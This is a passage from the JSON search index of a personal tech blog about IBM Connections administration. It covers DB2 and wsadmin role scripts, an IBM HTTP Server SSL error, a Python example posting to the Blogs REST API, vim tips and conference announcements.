displayed.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-03-06-missing-images-in-wikis-after-migration-to-ibm-connections-5-5/","title":"Missing images in Wikis after migration to IBM Connections 5.5"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/wikis/","title":"Wikis"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ibmconnect/","title":"Ibmconnect"},{"body":"Since the IBM Connect pages does not show all presentation, I uploaded mine to slideshare.\nTDI Solutions Best Practices with IBM Connections Deployments Best and Worst Practices Deploying IBM Connections 2016 ","excerpt":"\u003cp\u003eSince the IBM Connect pages does not show all presentation, I uploaded mine to \u003cdel\u003eslideshare\u003c/del\u003e.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-02-09-my-presentations-at-ibm-connect-2016/","title":"My presentations at IBM Connect 2016"},{"body":"Today i read a question in the IBM Connections Forum about setting the EMPLOYEE_EXTENDED role to all users in a Connections deployment.\nIt would be easy to set it directly in the database, but that’s not supported by IBM.\nI wrote a little script some weeks ago, because i had the same request, but never published it. The good thing here it only uses supported commands.\nSo i use this question to add it as a new script to my GitHub Repository .\nHere you see the source, it is simple a join of the tables emp_role_map and employee:\nconnect to peopledb; EXPORT TO mail.txt OF DEL MODIFIED by NOCHARDEL select e.PROF_MAIL FROM EMPINST.EMPLOYEE e inner join EMPINST.EMP_ROLE_MAP r on r.PROF_KEY=e.PROF_KEY where r.ROLE_ID!=\u0026#39;employee.extended\u0026#39;; connect reset; Just call it with db2 -tvf scriptname.sql.\nThe script exports a list of mail addresses of users without the specified role. This can then be used with the wsadmin command\nProfilesService.setBatchRole(EMPLOYEE_EXTENDED, \u0026#34;mail.txt\u0026#34;) Or as a oneliner:\nwsadmin.bat -lang jython -c \u0026#39;ProfilesService.setBatchRole(EMPLOYEE_EXTENDED, \u0026#34;mail.txt\u0026#34;)\u0026#39; Scheduling the two commands with Windows Scheduler or cron is enough to update all users to the specified role.\nDocumentation is provided in the script head.\n","excerpt":"\u003cp\u003eToday i read a question in the IBM Connections Forum\n\u003ca href=\"http://www-10.lotus.com/ldd/lcforum.nsf/d6091795dfaa5b1185256a7a0048a2d0/9a49290a4458d58985257f4100393ef2?OpenDocument\" target=\"_blank\"\u003eabout\nsetting the EMPLOYEE_EXTENDED role to all users \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in a Connections\ndeployment.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-01-21-adding-employee_extended-to-all-users/","title":"Adding EMPLOYEE\\_EXTENDED to all users"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/db2/","title":"DB2"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/jython/","title":"Jython"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/sql/","title":"SQL"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/failure/","title":"Failure"},{"body":"Today I got a call that a IBM HTTP Server stopped working after a reboot. The service starts and ends again after some seconds. In the error_log of IBM HTTP we found following messages:\n[notice] Bld version: 8.5.5 [notice] Bld date: Oct 30 2014, 11:44:02 [notice] Webserver: IBM_HTTP_Server [notice] Using config file C:/IBM/HTTPServer/conf/httpd.conf [notice] IBM_HTTP_Server/8.5.5.4 (Win32) configured -- resuming normal operations [notice] Server built: Oct 20 2014 10:58:09 [notice] Disabled use of AcceptEx() WinSock2 API [notice] Parent: Created child process 4004 [crit] Error 10 initializing SSL environment, aborting startup [error] SSL0115E: Initialization error, Error validating ASN fields in certificate. Configuration Failed [crit] (OS 1813)The specified resource type cannot be found in the image file. : master_main: create child process failed. Exiting. [notice] Parent: Forcing termination of child process 5 Good source found was:\nhttps://developer.ibm.com/answers/questions/195652/why-is-the-ibm-http-server-8x-version-fails-to-sta.html In our case the Stashfile was configured with a expiration date. So just open the keyfile, change password and check that the option expiration of stash is deactivated.\n","excerpt":"\u003cp\u003eToday I got a call that a IBM HTTP Server stopped working after a\nreboot. The service starts and ends again after some seconds. In the\nerror_log of IBM HTTP we found following messages:\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-12-21-ssl0115e-initialization-error-error-validating-asn-fields-in-certificate/","title":"SSL0115E: Initialization error, Error validating ASN fields in certificate"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/api/","title":"API"},{"body":"Today i thought about creating and deleting some Communities with the REST API. Works really good and i need to post my findings sometimes.\nFirst cool thing is that you can create restricted Communities with external feature through REST.\nAfter deleting these Communities i checked the Community overview through my browser and found following view:\nSo you mustn’t use wsadmin to restore Communities from trash, you can use this view. Never heared of it and the documentation still mentions wsadmin as the only way to restore them.\n","excerpt":"\u003cp\u003eToday i thought about creating and deleting some Communities with the\nREST API. Works really good and i need to post my findings sometimes.\u003c/p\u003e\n\u003cp\u003eFirst cool thing is that you can create restricted Communities with\nexternal feature through REST.\u003c/p\u003e\n\u003cp\u003eAfter deleting these Communities i checked the Community overview\nthrough my browser and found following view:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2015/12/2015-12-15_20-45-47.png\" alt=\"2015 12 15 20 45 47\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eSo you mustn’t use wsadmin to restore Communities from trash, you can\nuse this view. Never heared of it and the\n\u003ca href=\"http://www-01.ibm.com/support/knowledgecenter/SSYGQH_5.0.0/admin/admin/t_admin_communities_soft_del.html?lang=en\" target=\"_blank\"\u003edocumentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nstill mentions wsadmin as the only way to restore them.\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-12-15-ibm-connections-communities-trash/","title":"IBM Connections – Communities Trash"},{"body":"The next big IBM Connections Community event – Social Connections 9 – takes place November 05/06 in Ehningen / Germany. The theme of the event is “Working out loud” and it offers tons of sessions all around IBM Connections and Adoption in the social software world.\nThis will be my fifth Social Connections Event after Zurich, Prague, Stockholm and Boston, for me all of them were great experiences and personally very successful.\nI have been working with ESS / ICS / Lotus products since 2000 and I followed many other community members through blogs, forums, web events and tweets, but I rarely had the chance to meet any of them in person. This changed with Social Connections V – I sent my first English session on the topic of scripting in IBM Connections and was accepted. I still can remember the warm welcome of Sharon , Klaus , Stuart , Simon , Femke , Sandra and Tim – it was phantastic!\n(Photo ©2015 by Oliver Heinz )\nThere a some really good ESS events all around the globe, but my focus topic is best covered by Social Connections. I like the agenda with all the different topics it covers: announcements (René Schimmer will show IBM Connections next ); Technic (master brains like Victor , Martin and Sjaak will speak); Deployment; Development (e.g. Paul and René ); Use Cases (Alan Hamilton ); or Adoption. And the best of all there is room to get the speaker personally for deeper discussion during the day and on the evening reception . Best chances for growing the own knowledge.\nAfter “only” attending and speaking up until now, This time Ii got the chance to help organizing this event. So, for the last three months I had the honour of assisting Wannes, Stuart, Simon, Doug, Lars, Martin, Jan, Maria and Femke in creating “Social Connections 9”. It is my sincere wish that you will like this event as much as I enjoyed all the events I “only” participated in before.\nThis time I am presenting two sessions, one with Victor Toal on IBM Connections Administration and a renewed “Best and worst practises deploying IBM Connections” . I am looking forward to co-presenting with Victor – I think we are a funny, yet dynamic duo with strange German dialects (him Austrian and I Bavarian), but we will (try to) speak in English, so all the people can follow, not only Germans with a fair understanding of the more beautiful German dialects ….\nSo, this is enough of me, my opinions and an introduction into German dialects – you Can still register for this event and I urge you to if you have not done so yet – think of all the lovely folk you can finally meet and interact with!\nRegistration is still open and thanks to our great sponsors it will cost you only 179€ (excl VAT), which also covers the admission to the AWESOME gala reception .\nWhat are you waiting for?\n","excerpt":"\u003cp\u003eThe next big IBM Connections Community event –\n\u003ca href=\"http://www.socialconnections.info\" target=\"_blank\"\u003eSocial Connections 9 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n – takes place\nNovember 05/06 in Ehningen / Germany. The theme of the event is “Working\nout loud” and it offers tons of sessions all around IBM Connections and\nAdoption in the social software world.\u003c/p\u003e\n\u003cp\u003eThis will be my fifth Social Connections Event after Zurich, Prague,\nStockholm and Boston, for me all of them were great experiences and\npersonally very successful.\u003c/p\u003e\n\u003cp\u003eI have been working with ESS / ICS / Lotus products since 2000 and I\nfollowed many other community members through blogs, forums, web events\nand tweets, but I rarely had the chance to meet any of them in person.\nThis changed with Social Connections V – I sent my first English session\non the topic of scripting in IBM Connections and was accepted. I still\ncan remember the warm welcome of \u003ca href=\"http://socialshazza.com\" target=\"_blank\"\u003eSharon \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\n\u003ca href=\"http://kbild.ch\" target=\"_blank\"\u003eKlaus \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, \u003ca href=\"http://social365.com\" target=\"_blank\"\u003eStuart \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\n\u003ca href=\"https://twitter.com/SimplyS1mon\" target=\"_blank\"\u003eSimon \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\n\u003ca href=\"http://femkegoedhart.com/\" target=\"_blank\"\u003eFemke \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, \u003ca href=\"http://twitter.com/sandrach\" target=\"_blank\"\u003eSandra \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nand \u003ca href=\"http://tc-soft.com/blog/\" target=\"_blank\"\u003eTim \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n – it was phantastic!\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-10-15-social-connections-9-in-germany-only-three-weeks-away/","title":"Social Connections 9 In Germany – Only Three Weeks Away"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/stuttgart/","title":"Stuttgart"},{"body":"The call for abstracts for Social Connections 9 in Ehningen will be closed on monday! So if you plan to attend and want to share your knowledge you have only few days left to submit your abstract!\nThe first keynote speakers are announced and i see forward to meet John Stepper – “Working Out Loud: How to make work more effective \u0026amp; fulfilling across your organization” and Silvia Cambie – “Convincing the C-Suite: Collaboration begins with Culture” If you’re interested to attend the event you can register on Eventbrite , Social Connections 9 will be on 5th and 6th november in Ehningen, Germany.\n","excerpt":"\u003cp\u003eThe \u003ca href=\"http://socialconnections.info/submit-abstract/\" target=\"_blank\"\u003ecall for abstracts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nfor \u003ca href=\"http://www.socialconnections.info\" target=\"_blank\"\u003eSocial Connections 9 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in Ehningen\nwill be closed on monday! So if you plan to attend and want to share\nyour knowledge you have only few days left to submit your abstract!\u003c/p\u003e\n\u003cp\u003eThe first \u003ca href=\"http://socialconnections.info/agenda/\" target=\"_blank\"\u003ekeynote speakers are\nannounced \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and i see forward to meet \u003ca href=\"http://www.workingoutloud.com\" target=\"_blank\"\u003eJohn\nStepper \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n –\n\u003ca href=\"http://socialconnections.info/social-connections-first-keynote-speaker-announced/\" target=\"_blank\"\u003e“Working\nOut Loud: How to make work more effective \u0026amp; fulfilling across your\norganization” \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and\n\u003ca href=\"http://socialconnections.info/our-lineup-is-growing-social-connections-presents-second-keynote-speaker/\" target=\"_blank\"\u003eSilvia\nCambie – “Convincing the C-Suite: Collaboration begins with Culture” \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eIf you’re interested to attend the event\n\u003ca href=\"http://socialconnections.info/#tile_registration\" target=\"_blank\"\u003eyou can register on\nEventbrite \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, Social Connections 9 will be on 5th and 6th november in\nEhningen, Germany.\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-08-28-social-connections-9-2-days-left-to-submit-abstracts/","title":"Social Connections 9 – 2 days left to submit abstracts"},{"body":"Admincamp 2015 will take place from 21st to 23rd September at Maritim Hotel Gelsenkirchen .\nI will talk about “IBM Connections administrieren” and “IBM Connections Best Practise”.\nDuring my first session i will show you the basic knowledge that you can manage your IBM Connections infrastructure, often needed tasks like reparent Communities, synchronise profiles, backup and basic troubleshooting.\nThe second session is the extended and updated version of my IBM ConnectED session, i will show you often seen mistakes during deployments, basic sizing thoughts and how to tune your environment.\nThe session will be in german and we have 90 minutes to cover all informations around IBM Connections deployment and administration.\nYou can find the whole agenda here .\nYou will find lots of well known people on this agenda like my colleague Christoph Adler , my former colleagues Andreas Artner , Denny Sternberg and Stephan Kopp , Alex Novak, Ben Menesi from Ytria , Ulrich Krause and much more!\nI like Admincamp very much because Rudi Knegt and his team created a great event with lots of content and the evening party with networking and knowledge sharing (and free beer).\nIf you’re interested in IBM ICS software, please join the event, there are still some places available. If you add my name or the blog address into the “Besonderheiten” field, you will get 50€ discount .\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.admincamp.de\" target=\"_blank\"\u003eAdmincamp 2015 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n will take place from 21st to\n23rd September at \u003ca href=\"http://www.maritim.de\" target=\"_blank\"\u003eMaritim Hotel Gelsenkirchen \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI will talk about “IBM Connections administrieren” and “IBM Connections\nBest Practise”.\u003c/p\u003e\n\u003cp\u003eDuring my first session i will show you the basic knowledge that you can\nmanage your IBM Connections infrastructure, often needed tasks like\nreparent Communities, synchronise profiles, backup and basic\ntroubleshooting.\u003c/p\u003e\n\u003cp\u003eThe second session is the extended and updated version of my IBM\nConnectED session, i will show you often seen mistakes during\ndeployments, basic sizing thoughts and how to tune your environment.\u003c/p\u003e\n\u003cp\u003eThe session will be in german and we have 90 minutes to cover all\ninformations around IBM Connections deployment and administration.\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-08-28-admincamp-2015-i-will-be-there/","title":"Admincamp 2015 – i will be there"},{"body":"Within the fixlist of the new released CR3 of IBM Connections 5 there are several new configuration options mentioned. One of the interesting ones for me is the mobile update parameter AllowRemoveAccount. The default value is “false” and your Connections environment still works before, but what’s changed when you set this to true?\nThe official documentation is already uptodate and shows us:\nWhen you set this option to true, accounts can be removed from a mobile device without requiring the user to login and without any authorization check. The user is asked to confirm the deletion of an account before it is removed.\nSo this helps me with my long list of Connections environments on my mobile clients. Until you set this to true you can only remove a profile, when you still can login to this system. I have several environments configured on my mobile which i can’t access anymore, because my user is disabled, or the system is only available within special wifi or network environments. So i’m not able to remove these accounts.\nI will set this to true in all environments i have access to, to prevent this behavior.\nPlease beware of the additional infos in the online help:\nIf a user has existing accounts that they cannot access and that were created before this feature was available, those accounts cannot be deleted using the AllowRemoveAccount property.\nValidation error After checking out the mobile-config.xml (yes you should always use wsadmin to change config parameters), the parameter was not set in the file. So i added it and saved my change.\nAfter checkIn i got a validation error, first i thought the order of parameters was wrong and so i checked the mobile-config.xsd. Even in the xsd the parameter wasn’t mentioned. So i checked \u0026lt;connections-root\u0026gt;/mobile/mobile/mobile/mobile-config/mobile-config.xsd|xml and there the parameter (and the other new ones) is available. I’m sure that the update was finished successfully without errors, so i checked two other systems (Windows and Linux) with CR3 and there was the same behavior, the new parameters were not copied to LotusConnections-config. After manually copying the xml and xsd i could set the values and after restarting of mobile the new feature was available.\nWhen i enabled the feature the first time and i like the xml validation feature of checkIn and checkOut, so i used wsadmin to checkOut the mobile-config.xml\nI haven’t checked if the new parameter useLeadingWildcardForGroupTypeahed with LotusConnections-config.xml works, but it isn’t available in the xsd too and i can’t found it in the complete connections-root directory. Will try the next days.\n","excerpt":"\u003cp\u003eWithin the\n\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21902940\" target=\"_blank\"\u003efixlist \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n of\nthe new released CR3 of IBM Connections 5 there are several new\nconfiguration options mentioned. One of the interesting ones for me is\nthe mobile update parameter AllowRemoveAccount. The default value is\n“false” and your Connections environment still works before, but what’s\nchanged when you set this to true?\u003c/p\u003e\n\u003cp\u003eThe\n\u003ca href=\"http://www-01.ibm.com/support/knowledgecenter/SSYGQH_5.0.0/admin/overview/r_mobile_config_properties.dita?lang=en\" target=\"_blank\"\u003eofficial\ndocumentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is already uptodate and shows us:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eWhen you set this option to true, accounts can be removed from a mobile\ndevice without requiring the user to login and without any authorization\ncheck. The user is asked to confirm the deletion of an account before it\nis removed.\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-08-18-another-new-feature-with-ibm-connections-5-0-cr3/","title":"Another new feature with IBM Connections 5.0 CR3"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/wsadmin/","title":"Wsadmin"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/markdown/","title":"Markdown"},{"body":"I use markdown since years to create my articles or most of documentation stuff.\nIt’s really cool to edit the text files on all of my devices, synchronize them fast through various internet services and create HTML, PDF or even DOCX files out of this sources.\nUntil last week i converted the markdown sources with pandoc and pasted the html code to the different pages, where i need them. So i copy and paste it to IBM Connections, Evernote or WordPress . On WordPress i use a plugin now to render the markdown textes, but for IBM Connections i didn’t found a way.\nSo why not using the IBM Connections API to post html, or even convert the file on the fly and put the html automatically?\nPosting to IBM Connections Blogs with Python You can read a lot on the IBM Connections API in the [official documentation](http://www-10.lotus.com/ldd/lcwiki.nsf/xpAPIViewer.xsp?lookupName=IBM Connections 5.0 API Documentation#action=openDocument\u0026amp;res_title=IBM_Connections_API_overview_ic50\u0026amp;content=apicontent), i’m not a developer so i need normally practical examples to use this.\nHow to connect to IBM Connections REST API with Python? First we need the URL to connect to the Blogs API:\nurl = \u0026#39;https://greenhouse.lotus.com/blogs/stoeps/api/entries\u0026#39; In this case “stoeps” is the blog handle, the blog where i want to add my post. You find the blog handle when you open the blog through your browser and check the url:\nNow we need to authenticate, Connections API can be used with basic authentication, so we create a base64 encoded string of username and password:\nimport base64 encodedstring = base64.encodestring(\u0026#39;christoph.stoettner@stoeps.de\u0026#39;+\u0026#34;:\u0026#34;+\u0026#39;myCoolPassword\u0026#39;)[:1] auth = \u0026#34;Basic %s\u0026#34; % encodedstring To post we have to use a XML File or XML String, which contains a title and body of our post, the REST service needs a Content-type of application/atom+xml:\nxml = \u0026#39;\u0026#39;\u0026#39;\u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt; \u0026lt;entry xmlns=\u0026#34;http://www.w3.org/2005/Atom\u0026#34; xmlns:app=\u0026#34;http://www.w3.org/2007/app\u0026#34; xmlns:snx=\u0026#34;http://www.ibm.com/xmlns/prod/sn\u0026#34;\u0026gt; \u0026lt;title type=\u0026#34;text\u0026#34;\u0026gt;That\u0026#39;s the title\u0026lt;/title\u0026gt; \u0026lt;content type=\u0026#34;html\u0026#34;\u0026gt;\u0026lt;![CDATA[\u0026lt;p\u0026gt;and some text for the body.\u0026lt;/p\u0026gt;]]\u0026gt;\u0026lt;/content\u0026gt; \u0026lt;/entry\u0026gt;\u0026#39;\u0026#39;\u0026#39; Now let’s connect to the REST service with urllib2 and post the xml string.\nimport urllib2 request = urllib2.Request( url ) request.add_data( xml ) # add_data changes Method to POST request.add_header( \u0026#39;Content-type\u0026#39;, \u0026#39;application/atom+xml\u0026#39; ) request.add_header( \u0026#39;Authorization\u0026#39;, auth ) response = urllib2.urlopen( request ) # let\u0026#39;s check return code if response.code = 201: print \u0026#39;Post successfully created\u0026#39; Some more We have seen that we can post a xml with title and body. There are more possible ways to get a html string for our post.\nI changed the xml variable to fill two variables with title and body.\npostTitle = \u0026#39;A cool API post to blogs\u0026#39; postBody = \u0026#39;\u0026#39;\u0026#39;\u0026lt;p\u0026gt;This is the body of our Blogs post, we can use html tags here\u0026lt;/p\u0026gt; \u0026lt;h2\u0026gt;Fill text to show more content\u0026lt;/h2\u0026gt; \u0026lt;p\u0026gt;Lorem ipsum dolor sit amet, consectetur adipiscing elit. In commodo posuere ante, ut faucibus enim sagittis ut. Fusce scelerisque arcu quis mattis fringilla. Pellentesque a est enim. Nam congue sem eget augue porttitor semper. Fusce luctus sit amet ligula sit amet viverra. Cras pulvinar arcu eget velit volutpat, in condimentum nunc luctus. Vivamus vestibulum ante et nisl venenatis consequat. Aliquam ut augue nec lectus sodales eleifend eleifend nec orci.\u0026lt;/p\u0026gt;\u0026#39;\u0026#39;\u0026#39; xml = \u0026#39;\u0026#39;\u0026#39;\u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt; \u0026lt;entry xmlns=\u0026#34;http://www.w3.org/2005/Atom\u0026#34; xmlns:app=\u0026#34;http://www.w3.org/2007/app\u0026#34; xmlns:snx=\u0026#34;http://www.ibm.com/xmlns/prod/sn\u0026#34;\u0026gt; \u0026lt;title type=\u0026#34;text\u0026#34;\u0026gt;\u0026#39; + postTitle + \u0026#39;\u0026lt;/title\u0026gt; \u0026lt;content type=\u0026#34;html\u0026#34;\u0026gt;\u0026lt;![CDATA[\u0026#39; + postBody + \u0026#39;]]\u0026gt;\u0026lt;/content\u0026gt; \u0026lt;/entry\u0026gt;\u0026#39;\u0026#39;\u0026#39; You see you can add html code to the variable postBody. You can read from a html file with:\npostBody = open(\u0026#39;post.html\u0026#39;).read() Or you can convert a markdown file to html:\nimport markdown2 markdownFile = \u0026#39;post.md\u0026#39; postBody = markdown2.markdown_path( markdownFile ) In my script here i added a function to read the first line of the markdown to set it as title and i added a function to find images integrated in the article, upload them to stoeps/api/media and replace the img src= tag.\nSo this post is completely written in markdown and i posted it through python to Greenhouse. Here is the link to the post .\n","excerpt":"\u003cp\u003eI use \u003ca href=\"http://daringfireball.net/projects/markdown/\" target=\"_blank\"\u003emarkdown \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n since years\nto create my articles or most of documentation stuff.\u003c/p\u003e\n\u003cp\u003eIt’s really cool to edit the text files on all of my devices,\nsynchronize them fast through various internet services and create HTML,\nPDF or even DOCX files out of this sources.\u003c/p\u003e\n\u003cp\u003eUntil last week i converted the markdown sources with pandoc and pasted\nthe html code to the different pages, where i need them. So i copy and\npaste it to IBM Connections, \u003ca href=\"http://www.evernote.com\" target=\"_blank\"\u003eEvernote \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n or\n\u003ca href=\"http://www.wordpress.com\" target=\"_blank\"\u003eWordPress \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. On WordPress i use a plugin now to\nrender the markdown textes, but for IBM Connections i didn’t found a\nway.\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-08-10-using-markdown-with-ibm-connections-blogs/","title":"Using markdown with IBM Connections Blogs"},{"body":"Julius Schwarzweller wrote a blog post with a collection of links to CR3 for IBM Connections 5.0 this week. A official update document with new features is missing.\nI installed it today (without CCM) and the first new feature i found is “sharing folders” with Communities:\nAs shown in the screenshot only public folders can be added to community files widget.\nFrom files application you can still share a folder with people, groups and communities (but then the folder will be public available too):\n","excerpt":"\u003cp\u003e\u003ca href=\"http://techblog.gis-ag.info/2015/07/21/ibm-connections-5-cr3-released/\" target=\"_blank\"\u003eJulius\nSchwarzweller wrote a blog post with a collection of links to CR3 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for\nIBM Connections 5.0 this week. A official update document with new\nfeatures is missing.\u003c/p\u003e\n\u003cp\u003eI installed it today (without CCM) and the first new feature i found is\n“sharing folders” with Communities:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2015/07/22-07-_2015_21-57-33.png\" alt=\"22 07 2015 21 57 33\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eAs shown in the screenshot only public folders can be added to community\nfiles widget.\u003c/p\u003e\n\u003cp\u003eFrom files application you can still share a folder with people, groups\nand communities (but then the folder will be public available too):\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2015/07/22-07-_2015_22-12-05.png\" alt=\"22 07 2015 22 12 05\" /\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-07-22-ibm-connections-5-0-cr3-is-available/","title":"IBM Connections 5.0 CR3 is available – new feature"},{"body":"Social Connections 8 ended some hours ago and first I want to thank the organization team ! It was a great job and an awesome conference you built here. The speaker gift was an absolute great idea!\nIt was the first time Social Connections headed to the United States and the location at IBM Boston was a well made decision. I visited the Boston area the first time and enjoyed all the days.\nI already arrived on Sunday evening and had the pleasure to stay with Victor and his family until we headed to Boston. Thanks for the hospitality!\nOpening session speaker Susan Livingston showed great new stuff around IBM Connections and IBM Verse. I think the most important is the planned function of synchronizing IBM Connections Files based on folders. Nested folder functionality is nice, i know that lots of people asking for this, but in my opinion i prefer to tag files and give me more possible keywords to find content.\nEditor enhancements sound really good, i hope that all these functions will appear in all IBM Connections application, to get a continuous experience.\nDuring the conference I had two sessions:\nBut the most important i met lovely people! Most of them i know online since years and we follow each other, discuss on several chats or share information through several blogs.\nOliver Heinz made perfect photos during the event and I’m sure they will be published on Flickr soon.\nYou can find some of my pictures in my Flickr Album .\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.socialconnections.info\" target=\"_blank\"\u003eSocial Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 8 ended some hours\nago and first I want to thank the\n\u003ca href=\"https://twitter.com/Colleeni/status/589154980663177216/photo/1\" target=\"_blank\"\u003eorganization\nteam \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n! It was a great job and an awesome conference you built here. The\nspeaker gift was an absolute great idea!\u003c/p\u003e\n\u003cp\u003eIt was the first time Social Connections headed to the United States and\nthe location at IBM Boston was a well made decision. I visited the\nBoston area the first time and enjoyed all the days.\u003c/p\u003e\n\u003cp\u003eI already arrived on Sunday evening and had the pleasure to stay with\n\u003ca href=\"http://notesbusters.com/\" target=\"_blank\"\u003eVictor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and his family until we headed to\nBoston. Thanks for the hospitality!\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-04-18-social-connections-8-boston/","title":"Social Connections 8 Boston"},{"body":"Many of you know that i like VI/http://vim.org[VIM] and when i say editor it must be VIM. Often i hear at customer sites or from my colleagues, that they can’t work with vi, that shortcuts are hard to remember or even they can’t save their changes.\nWhen you remember some short commands, you can work very fast and you can edit files through all connections (ssh, x-forward) to a server.\nI created a mindmap as preparation for a speedgeeking session, the session wasn’t accepted, but the file is already done. So you can download a cheat-mindmap with a collection of shortcuts. Navigate in files Shortcuts in command mode:\ngg – top of file\nG – end of file\n: – =number go to line number\n0 – beginning of line\n$ – end of line\nSave and undo :w – save file\n:wq – save and close\n:q! – close and do not safe\nu – Undo\nSome additional things When i need to change Connections URLs within LotusConnections-config.xml after adding the webserver to my ISC, i can do this with one line.\nChanging Connections URLs Checkout LotusConnections-config.xml and edit with vim. You will find several links to your application server hostname with WebSphere ports (e.g. http://washost1.example.com:9081 ). When you use a large deployment you have about 15 application servers with http and https links, so you need to change 30 different urls.\nWith vim we can use regular expressions to change the urls. Lets change washost1.example.com:anyport to connections.example.com.\nOpen LotusConnections-config.xml with vim and stay in command mode. Type\n:%s/washost1.example.com:9[0-9]*/connections.example.com/g :%s is search and replace,\nfirst part within / / is text which will be replaced\n[0-9]* any count of a number\ng global replace (multiple search text in one line)\nComment out some lines in httpd.conf I often test things in my IBM HTTP Server Configuration and when i want to comment out some lines or remove the comment signs there is a easy way with vim.\nOpen httpd.conf and hit Ctrl+V (enters Visual Block mode),\nnow you can mark some characters with j (moves cursor down) or arrow keys:\nNow type a capital i → Shift+i, the cursor jumps back to the first character you marked and you can add text (e.g. “# “):\nfinish the commands with ESC:\nRemove characters in multiple lines You can remove the comments with nearly the same command.\nOpen the file, change to visual block mode (ctrl+v), mark the characters with arrow keys and remove with d.\n","excerpt":"\u003cp\u003eMany of you know that i like VI/http://vim.org[VIM] and when i say\neditor it must be VIM. Often i hear at customer sites or from my\ncolleagues, that they can’t work with vi, that shortcuts are hard to\nremember or even they can’t save their changes.\u003c/p\u003e\n\u003cp\u003eWhen you remember some short commands, you can work very fast and you\ncan edit files through all connections (ssh, x-forward) to a server.\u003c/p\u003e\n\u003cp\u003eI created a mindmap as preparation for a speedgeeking session, the\nsession wasn’t accepted, but the file is already done. So you\n\u003ca href=\"/images/2015/02/VIM-cheat-mindmap.pdf\"\u003ecan\ndownload a cheat-mindmap with a collection of 